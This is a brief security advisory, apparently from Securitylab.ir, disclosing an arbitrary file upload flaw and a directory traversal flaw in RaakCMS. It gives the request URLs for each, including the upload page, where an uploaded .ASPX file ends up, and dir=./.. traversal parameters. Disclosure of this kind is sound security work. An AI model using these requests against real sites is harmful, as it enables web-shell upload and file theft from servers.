RaakCMS Multiple Vulnerabilities

################################################################# # Securitylab.ir ################################################################# # Application Info: # Name: RaakCms # Vendor: http://raakcms.com ################################################################# Vulnerability: ======================= Arbitrary File Upload ======================= http://server/webmaster/pic.aspx select file and folder , your file upload here: http://server/User_Images/[Folder]/FILE.ASPX ======================= Directory Traversal ======================= http://server/browse.asp?dir=./.. http://server/browseFile.asp?dir=./.. ################################################################# ################################################################# # Discoverd By: Pouya Daneshmand # Website: http://securitylab.ir # Contacts: info[at]securitylab.ir & whh_iran@yahoo.com<mailto:whh_iran@yahoo.com> ###################################################################